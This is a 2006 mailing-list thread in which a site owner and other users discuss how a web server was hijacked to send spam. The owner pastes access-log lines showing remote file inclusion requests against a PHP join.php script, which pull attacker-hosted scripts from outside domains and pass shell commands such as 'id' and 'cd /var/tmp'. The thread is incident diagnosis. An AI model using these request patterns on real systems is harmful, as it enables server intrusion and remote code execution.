-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
On Tue, 23 May 2006 08:45:30 +0100 Paul Howarth paul@city-fan.org wrote:
On Mon, 2006-05-22 at 23:11 -0400, CodeHeads wrote:
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
On Tue, 23 May 2006 00:14:32 +0000 replies-lists-redhat@listmail.innovate.net wrote:
i haven't been following this topic in great detail, but i suspect that you have a form on your site that is being exploited for "form spam". if you're not familiar with this, search google for "form spam".
- Rick
Rick, Thank you, No, I have not heard of this.
I don't think that's what this is. Form spam takes advantage of poorly-coded mail/contact forms and uses them to send mail to recipients other than those intended by the form designer.
What's happening here is that the spammer is running their own code (downloaded into /tmp) to send the mail, a rather more serious situation.
Paul.
I might not know too much but I really think they are using my forms. I found quite a few log entries. Here are a few. 81.199.173.8 - - [22/May/2006:18:57:51 -0400] "POST /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://www.tiffefermaintfashion.com/gbook/tmp/xzblog.txt? HTTP/1.0" 200 5923
AOL: 172.179.33.217 - - [21/May/2006:07:58:01 -0400] "GET /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=id HTTP/1.1" 200 2374 172.179.33.217 - - [21/May/2006:07:58:20 -0400] "GET /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=w HTTP/1.1" 200 2412 172.179.33.217 - - [21/May/2006:07:58:34 -0400] "GET /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=cd%20/var/tmp HTTP/1.1" 200 2323
And the xpl.netmisphere2.com site has hacking information: http://xpl.netmisphere2.com/ I think this outta be illegal!!